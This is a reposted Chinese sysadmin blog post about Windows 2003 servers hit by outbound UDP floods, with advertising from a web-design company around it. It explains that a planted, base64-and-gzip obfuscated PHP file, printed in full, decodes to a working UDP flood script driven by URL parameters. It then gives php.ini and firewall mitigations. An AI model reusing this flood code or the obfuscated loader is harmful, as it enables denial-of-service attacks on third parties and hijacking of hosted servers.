win2003遭受udp攻击导致带宽占用很大

后来发现在一个网站里面发现一个加密的.解密后看到很熟悉的 udp 莫非有关系?.果然 也有朋友遇到这样的情况,看来封禁对外udp是很必要的,

公司主营业务：成都网站建设、成都网站制作、移动网站开发等业务。帮助企业客户真正实现互联网宣传，提高企业的竞争能力。创新互联公司是一支青春激扬、勤奋敬业、活力青春激扬、勤奋敬业、活力澎湃、和谐高效的团队。公司秉承以“开放、自由、严谨、自律”为核心的企业文化，感谢他们对我们的高要求，感谢他们从不同领域给我们带来的挑战，让我们激情的团队有机会用头脑与智慧不断的给客户带来惊喜。创新互联公司推出赞皇免费做网站回馈大家。

以下为转帖:

关于近期一些服务器遭受UDP攻击的说明

近来我有一两台服务器显示经常受到udp攻击

导致服务器带宽占用到100%，用华盾查流量占用也无法查到具体是哪个站被攻击了，起初以为是cc攻击，因为停止了iis带宽就为0了，其实不然，都是部分用户被入侵导致的

下面我想说一下被入侵的原理

用户程序中的一个php页面的原代码:


/*

gl

*/

eval(gzinflate(base64_decode('

DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw

6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb

VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY

ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4

wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG

3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1

3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw

xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu

SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw

e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu

bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c

hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));

经过N次解密后的代码：


复制代码 代码如下:


$packets = 0;

$ip = $_GET[\'ip\'];

$rand = $_GET[\'port\'];

set_time_limit(0);

ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();

print \"Flooded: $ip on port $rand

\";

$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){

$out .= \"X\";

}

while(1){

$packets++;

if(time() > $max_time){

break;

}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";

?>

baidu了一下工作原理：

先把你代码放到一个正常的网页中.

通过url传递IP和端口以udp的方式打开.传递文件到服务器写出.

这样服务器就中招了.

也就是服务器显示udp攻击，带宽占用非常之严重，基本是100%，一般徘徊在97%-99%之间

解决方案：

在php.ini中限制php用网络。

在php.ini里设其值为Off

allow_url_fopen = Off

并且:

;extension=php_sockets.dll

前面的;号一定要有,意思就是限制用sockets.dll

然后重启IIS

我没关这个函数,有的程序需要貌似,直接把udp出站端口给封了.

文章标题：win2003遭受udp攻击导致带宽占用很大
网站网址：http://www.shufengxianlan.com/qtweb/news31/218081.html

网站建设、网络推广公司-创新互联，是专注品牌与效果的网站制作，网络营销seo公司；服务项目有等

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联